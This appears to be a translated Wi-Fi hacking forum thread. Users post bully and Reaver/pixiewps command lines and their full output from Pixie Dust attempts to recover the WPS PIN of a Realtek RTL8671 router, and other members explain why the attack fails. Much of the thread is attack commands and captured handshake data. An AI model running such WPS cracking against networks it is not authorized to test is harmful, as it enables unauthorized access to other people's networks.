[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
Offline
You need to use the version modified by aanarchy to carry out a pixiedust attack: Bully WPS: The alternative to Reaver is reborn with Pixiewps support
In any case, if you have not been able to check even a single first half of a PIN, it means you cannot send an M4.
If you cannot send an M4, it means you never received an M3 at any point, and therefore you will not be able to carry out a pixie dust attack.
For your anonymity it is better to delete/edit the bSSID and eSSID of your network, and the MAC of your wifi device is visible too.
I am editing your message.
Be careful next time (I say it for your own sake).
PS: I see that the first post is not complete (the latest progress is missing) and has a few mistakes (blame the rush and the excitement); I will touch it up.
Offline
Well, thanks for your recommendations; I am going to try again with the modified version to see if I get lucky.
Well, greetings, here I am bothering you again. This is the result of the attack with bully. I have also tried it with v4 instead of v3, and also with the wifi adapter built into the PC (it is an Intel), but without good results.
root@kali:~# time sudo bully wlan1mon -b 00:13:33 -c 1 -d -v 3
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[+] Switching interface 'wlan1mon' to channel '1'
[!] Using '01:0d:b1' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '00:13:33' on channel '1'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'Rocabado' (00:13:33)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/001333.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
^C
Saved session to '/root/.bully/001333.run'
real 0m36.012s
user 0m0.080s
sys 0m0.340s
Offline
I have also tried it with v4 instead of v3, and also with the wifi adapter built into the PC (it is an Intel), but without good results
v3 and v4 only mean more or less information; it has nothing to do with getting the PIN, you might as well leave it out.
Offline
It is the same.
You are looping on your first PIN.
If you cannot manage to check a first half, it means you could not send an M4 because you did not receive the M3.
Half of the strings needed to carry out a pixie dust attack, whatever the chipset of the access point, are in the M3.
No M3 = no pixie dust.
Offline
Well, my tests to obtain the WPS PIN with the MAC 00:13:33 are over. I am grateful for your recommendations and will keep reading to see if anything new comes up.
Offline
In any case, going back over the pixiewps thread on the Kali Linux forum, I have seen that the RTL8671 is the chipset... that is not supported.
Nothing at all.
------------------------ edit ---------------------------------------
@ Patcher (and everyone)
With what you have found about the Liveboxes, I have decided to create a new thread so that we can study this and see if we can work out the algorithm:
WPS algorithm livebox 2.1 and 3.1 (orange / arcadyan)
Thanks again, I have a good feeling; you may have hit the nail on the head.
Offline
Below I am posting Sergio's message, which was not in the right place:
It cannot be; I was so happy to have obtained M3. Running the test with the modified pixiewps 1.2, -e -r -s -z -a -n -v 3, it tells me the pin was not found. Let's see if someone can check it for me and tell me whether something is missing or whether it is not vulnerable. RTL 8671, MAC 00:13:33
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
[+] Switching wlan1 to channel 6
[+] Waiting for beacon from 00:13:33:
[!] WARNING: Failed to associate with 00:13:33:
[+] Associated with 00:13:33:
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 00:00:54:7e:00:00:6a:5c:00:00:00:f6:00:00:71:ec
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: f2:5c:72:3f:6a:0c:a0:14:79:2d:c7:b3:a9:6d:68:44
[P] PKR: 97:27:1a:fa:d5:13:1b:70:3d:c1:44:9c:be:99:0c:66:96:11:0a:b5:8d:d6:41:1a:ee:60:1e:27:2c:c4:42:d8:f6:8b:12:81:12:40:03:ae:f3:1e:f6:34:25:08:9f:3b:8f:4a:d1:81:09:3f:b3:51:ee:ca:8c:a6:70:61:16:d9:3e:6c:11:55:56:e7:e3:d1:56:a0:4f:13:8c:ee:a6:70:5c:9e:7c:60:00:ec:72:d0:ec:eb:5e:6f:10:f5:6c:58:f2:94:8a:04:16:fb:09:70:e7:11:4a:47:52:bd:86:ac:44:02:8b:df:d0:b3:ed:df:fb:34:50:2a:06:cc:9a:2b:ff:6c:36:c2:cd:fc:7f:2d:4d:8d:6e:35:d5:97:35:dc:fb:0d:fa:b4:ef:8b:70:30:d9:bb:38:47:fd:b9:64:82:85:31:11:32:c2:52:78:ae:8f:99:37:2e:c9:1b:6d:00:97:d9:9f:44:cf:98:18:f8:6f:73:3a:c4:4c:f1:fc:cf
[P] AuthKey: 30:f8:51:9e:d8:f6:b7:d4:8d:13:9d:93:19:63:cc:2a:cc:8b:d3:74:3e:7b:10:02:1d:49:c3:9b:54:1d:c3:cb
[+] Sending M2 message
[P] E-Hash1: 06:13:1a:f6:38:70:a8:31:29:ac:9b:82:37:4f:a5:a2:20:89:e6:66:48:80:23:60:b0:e5:48:99:f2:f5:cc:c1
[P] E-Hash2: 79:a8:c7:f4:59:73:5f:83:ef:32:9c:72:3b:9e:2b:c2:7f:2e:19:ff:6e:63:f5:79:9c:6f:c2:7d:20:69:e6:25
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
The answer is the same as before: this chipset (Realtek RTL8671) is not vulnerable to the pixie dust attack.
Offline